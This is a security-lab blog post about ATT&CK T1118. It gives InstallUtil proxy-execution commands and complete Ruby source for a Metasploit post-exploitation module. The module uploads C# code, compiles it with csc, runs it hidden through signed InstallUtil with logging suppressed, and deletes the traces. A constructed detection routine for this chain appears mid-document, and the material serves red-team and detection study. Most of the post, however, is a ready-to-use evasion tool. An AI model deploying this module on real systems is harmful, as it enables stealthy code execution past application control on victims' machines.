Tech Share | Writing a Metasploit post-exploitation module for ATT&CK T1118

XCTF联赛小秘  2020-09-04 14:31:47

赛宁网安 Tianyu Lab (天虞实验室), formally established in June 2020, is the security team of 赛宁网安 dedicated to offensive and defensive research. It currently has 20 professional security researchers focusing on penetration testing, secure development, IoT security and ICS security.




1. T1118

Adversaries may use InstallUtil to proxy code execution through a trusted Windows utility. InstallUtil is a command-line utility that allows installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) InstallUtil is digitally signed by Microsoft and located in the .NET directories on a Windows system:

```text
C:\Windows\Microsoft.NET\Framework\v<version>\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework64\v<version>\InstallUtil.exe
```

InstallUtil can also be used to bypass application control by executing a class in the binary that is decorated with the attribute [System.ComponentModel.RunInstaller(true)].


2. T1118 PoC

InstallUtil HelpText method call


Step 1: compile the C# source into a DLL.

```bat
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library T1118.cs
```

Step 2: load the DLL through InstallUtil's uninstall path.

```bat
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /U /logfile= /logtoconsole=false T1118.dll
```


HelpText call:

```bat
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /? T1118.dll
```




3. Writing the module

Approach:
Since T1118 belongs to the post-exploitation phase, once a session has been obtained the module performs the following steps:
1. Upload the source code
2. Compile the DLL with csc
3. Load the DLL through InstallUtil.exe

Options that need to be defined:
1. Local C# source file
2. Upload path on Windows
3. .NET version

Under /usr/share/metasploit-framework/modules/post/windows/ and /usr/share/metasploit-framework/data/ we create a new folder, named tianyu in this article, which will hold the ATT&CK-related attack modules.

Then create a new Ruby file named t1118.rb.



1. Initialize the module

Reference: the official guide to writing a post module, https://github.com/rapid7/metasploit-framework/wiki/How-to-get-started-with-writing-a-post-module

Define the initialization info.


Set the options:

```ruby
# RFILE is optional; when blank, remote_file falls back to the basename of LFILE
OptString.new('RFILE', [false, '上传到windows路径', 'C:\\windows\\temp\\t1118.tmp']),
OptString.new('LFILE', [true, '本地t1118.cs路径', ::File.join(Msf::Config.install_root, "data", "tianyu", "t1118", "t1118.cs")]),
OptBool.new('CLEANUP_FILE', [true, "清理文件", true]),
OptString.new('DOTNET_VERSION', [true, 'DotNet Version', 'v4.0.30319']),
```

Define what the run command executes (skeleton to be filled in below):

```ruby
def run
  begin
    # Only Meterpreter sessions are supported
    return 0 if session.type != "meterpreter"
    print_good("模块T1118执行成功")
  rescue ::Exception => e
    print_status("Unable to execute: #{e.message}")
    print_error("模块T1118执行失败")
    return
  end
end
```

2. Define the local file and the upload path

Define remote_file and local_file to read datastore['RFILE'] and datastore['LFILE']:

```ruby
# Remote path for the uploaded source; falls back to the basename of LFILE when RFILE is blank
def remote_file
  if datastore['RFILE'].blank?
    remote_name = File.basename(datastore['LFILE'])
  else
    remote_name = datastore['RFILE']
  end
  remote_name
end

# Local C# source file
def local_file
  datastore['LFILE']
end
```

3. Remove the uploaded source

```ruby
# Register the uploaded source for deletion when the module finishes.
# remote_file is used (rather than datastore['RFILE'] directly) so the
# fallback name is honoured when RFILE is blank.
def clean_file
  print_status("Removing files...")
  register_file_for_cleanup(remote_file)
end
```

4. Define the CMD command

Run commands with run_cmd:

```ruby
# Run a command through cmd.exe. With io=true the output is captured via
# cmd_exec and printed; with io=false the process is started hidden and
# the module does not wait for output.
def run_cmd(user_cmd, io = true)
  cmd = "cmd /c #{user_cmd}"
  begin
    print_status("Executing '#{cmd}' on #{session.inspect}")
    if io
      res = cmd_exec(cmd)
      print_warning(res) if res
    else
      session.sys.process.execute(cmd, nil, { 'Hidden' => true })
    end
  rescue ::Exception => e
    print_error("Unable to execute: #{e.message}")
    return
  end
end
```

5. Upload the file and execute the commands

This step does the following:

1) Upload the local /usr/share/metasploit-framework/data/tianyu/t1118/t1118.cs to C:\windows\temp\t1118.tmp

2) Compile t1118.tmp with csc.exe

3) Invoke the compiled DLL with InstallUtil

4) Delete the source file

```ruby
def run
  begin
    return 0 if session.type != "meterpreter"
    rfile = remote_file
    lfile = local_file
    dotnet_version = datastore['DOTNET_VERSION']
    base = 'C:\Windows\Microsoft.NET\Framework'
    csc = base + '\\' + dotnet_version + '\\' + 'csc.exe'
    installutil = base + '\\' + dotnet_version + '\\' + 'installutil.exe'
    dll = 'C:\\windows\\temp\\t1118.dll'

    upload_file(rfile, lfile)

    # Same as the PoC: csc.exe /target:library T1118.cs
    # (/target:library is required, otherwise csc builds an .exe and expects a Main)
    cmd = %Q(#{csc} /target:library /out:#{dll} #{rfile})
    print_status("Compiling...")
    run_cmd(cmd)
    sleep(2)

    # Same as the PoC: InstallUtil.exe /U /logfile= /logtoconsole=false T1118.dll
    cmd = %Q(#{installutil} /logfile= /LogToConsole=false /U #{dll})
    print_status("Executing InstallUtil...")
    run_cmd(cmd, false)
    print_good("模块T1118执行成功")
    sleep(2)

    # Honour the CLEANUP_FILE option; the compiled DLL is removed along with the source
    if datastore['CLEANUP_FILE']
      register_file_for_cleanup(dll)
      clean_file
      print_good("清理缓存成功")
    end
  rescue ::Exception => e
    print_status("Unable to execute: #{e.message}")
    print_error("模块T1118执行失败")
    return
  end
end
```
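From the defender's side, the chain above leaves a recognisable trace: csc.exe writing a library into a user-writable directory, followed within seconds by InstallUtil.exe running with /U, an empty /logfile= and /LogToConsole=false against a DLL in that directory. The following detection logic is an added example, not part of the original module; the Sysmon-style event records, field names and the 60-second correlation window are constructed.

```ruby
require 'time'

# Constructed Sysmon-style process-creation records (not real telemetry);
# the first two mirror the module's compile-then-load chain on one host.
SAMPLE_EVENTS = [
  { time: '2020-09-04T14:30:01Z', host: 'WS01',
    image: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe',
    cmdline: 'csc.exe /target:library /out:C:\windows\temp\t1118.dll C:\windows\temp\t1118.tmp' },
  { time: '2020-09-04T14:30:03Z', host: 'WS01',
    image: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe',
    cmdline: 'installutil.exe /logfile= /LogToConsole=false /U C:\windows\temp\t1118.dll' },
  { time: '2020-09-04T09:00:00Z', host: 'BUILD01',
    image: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe',
    cmdline: 'InstallUtil.exe "C:\Program Files\Vendor\Service.exe"' },
]

# Directories a low-privilege user can write to (constructed; extend for your estate)
USER_WRITABLE = /\\(windows\\temp|users\\[^\\]+\\appdata|programdata)\\/i
WINDOW = 60 # assumed max seconds between compile and load to treat them as one chain

def image_name(path)
  File.basename(path.tr('\\', '/')).downcase
end

# InstallUtil run the way the module runs it: /U (the uninstall path still executes
# the Installer class), logging suppressed, and a DLL from a user-writable directory.
def suspicious_installutil?(ev)
  return false unless image_name(ev[:image]) == 'installutil.exe'
  cl = ev[:cmdline]
  quiet = cl.match?(%r{/logfile=(\s|$)}i) || cl.match?(%r{/logtoconsole=false}i)
  cl.match?(%r{(^|\s)/u(\s|$)}i) && quiet && cl.match?(USER_WRITABLE)
end

# csc.exe compiling from, or into, a user-writable directory
def suspicious_csc?(ev)
  image_name(ev[:image]) == 'csc.exe' && ev[:cmdline].match?(USER_WRITABLE)
end

# One alert per suspicious InstallUtil launch, upgraded to the full compile-then-load
# chain when csc.exe ran on the same host within WINDOW seconds before it.
def correlate(events)
  events.select { |ev| suspicious_installutil?(ev) }.map do |ev|
    t = Time.iso8601(ev[:time])
    compiled = events.any? do |e|
      e[:host] == ev[:host] && suspicious_csc?(e) && (0..WINDOW).cover?(t - Time.iso8601(e[:time]))
    end
    { host: ev[:host], rule: compiled ? 'csc.exe -> InstallUtil proxy execution' : 'InstallUtil quiet /U load of temp DLL' }
  end
end
```

The third record, a signed vendor installer run from Program Files without /U, is not flagged, which is the false-positive case this check is meant to survive.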

Initial option settings of the loaded t1118 module



After running the PoC



After running the PoC with shellcode filled in


Demo


4. Complete code


Add the library to /usr/share/metasploit-framework/lib/msf/core/post/windows.rb:

```ruby
require 'msf/core/post/windows/tianyu'
```

Define the library file /usr/share/metasploit-framework/lib/msf/core/post/windows/tianyu.rb:

```ruby
# -*- coding: binary -*-
module Msf
class Post
module Windows
module Tianyu

  # Remote path for the uploaded source; falls back to the basename of LFILE when RFILE is blank
  def remote_file
    if datastore['RFILE'].blank?
      remote_name = File.basename(datastore['LFILE'])
    else
      remote_name = datastore['RFILE']
    end
    remote_name
  end

  # Local C# source file
  def local_file
    datastore['LFILE']
  end

  # Register the uploaded source for deletion when the module finishes
  # (remote_file honours the fallback name when RFILE is blank)
  def clean_file
    print_status("Removing files...")
    register_file_for_cleanup(remote_file)
  end

  # Run a command through cmd.exe; io=true captures and prints output,
  # io=false starts a hidden process without waiting for output
  def run_cmd(user_cmd, io = true)
    cmd = "cmd /c #{user_cmd}"
    begin
      print_status("Executing '#{cmd}' on #{session.inspect}")
      if io
        res = cmd_exec(cmd)
        print_warning(res) if res
      else
        session.sys.process.execute(cmd, nil, { 'Hidden' => true })
      end
    rescue ::Exception => e
      print_error("Unable to execute: #{e.message}")
      return
    end
  end

end # Tianyu
end # Windows
end # Post
end # Msf
```

Module file /usr/share/metasploit-framework/modules/post/windows/tianyu/t1118.rb:

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Exploit::FileDropper
  include Msf::Post::Windows::Tianyu

  def initialize(info = {})
    super(update_info(info,
      'Name'         => 'InstallUtil (T1118) Windows',
      'Description'  => %q{ ATT&CK 模块编写 T1118 },
      'License'      => MSF_LICENSE,
      'Author'       => [ '天虞实验室-demon' ],
      'References'   => [
        [ 'URL', 'https://attack.mitre.org/wiki/Technique/T1118' ],
        [ 'URL', 'https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1118' ],
        [ 'URL', 'https://gist.github.com/lithackr/b692378825e15bfad42f78756a5a3260' ],
        [ 'URL', 'https://github.com/praetorian-code/purple-team-attack-automation/blob/master/modules/post/windows/purple/t1118.rb' ]
      ],
      'Platform'     => [ 'win' ],
      'SessionTypes' => [ 'meterpreter' ]
    ))
    register_options([
      OptString.new('RFILE', [false, '上传到windows路径', 'C:\\windows\\temp\\t1118.tmp']),
      OptString.new('LFILE', [true, '本地t1118.cs路径', ::File.join(Msf::Config.install_root, "data", "tianyu", "t1118", "t1118.cs")]),
      OptBool.new('CLEANUP_FILE', [true, "清理文件", true]),
      OptString.new('DOTNET_VERSION', [true, 'DotNet Version', 'v4.0.30319']),
    ])
  end

  def run
    begin
      return 0 if session.type != "meterpreter"
      rfile = remote_file
      lfile = local_file
      dotnet_version = datastore['DOTNET_VERSION']
      base = 'C:\Windows\Microsoft.NET\Framework'
      csc = base + '\\' + dotnet_version + '\\' + 'csc.exe'
      installutil = base + '\\' + dotnet_version + '\\' + 'installutil.exe'
      dll = 'C:\\windows\\temp\\t1118.dll'

      upload_file(rfile, lfile)

      # csc.exe /target:library ... (see the PoC); without /target:library csc builds an .exe
      cmd = %Q(#{csc} /target:library /out:#{dll} #{rfile})
      print_status("Compiling...")
      run_cmd(cmd)
      sleep(2)

      # InstallUtil.exe /U /logfile= /logtoconsole=false ... (see the PoC)
      cmd = %Q(#{installutil} /logfile= /LogToConsole=false /U #{dll})
      print_status("Executing InstallUtil...")
      run_cmd(cmd, false)
      print_good("模块T1118执行成功")
      sleep(2)

      # Honour CLEANUP_FILE; remove the compiled DLL together with the source
      if datastore['CLEANUP_FILE']
        register_file_for_cleanup(dll)
        clean_file
        print_good("清理缓存成功")
      end
    rescue ::Exception => e
      print_status("Unable to execute: #{e.message}")
      print_error("模块T1118执行失败")
      return
    end
  end
end
```

Cobalt Strike follows the same approach and structure.
Below is a demo of the script I have already written.




References:

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md#atomic-test-7---installutil-helptext-method-call
https://attack.mitre.org/techniques/T1218/004/
https://github.com/praetorian-code/purple-team-attack-automation/blob/master/modules/post/windows/purple/t1118.rb
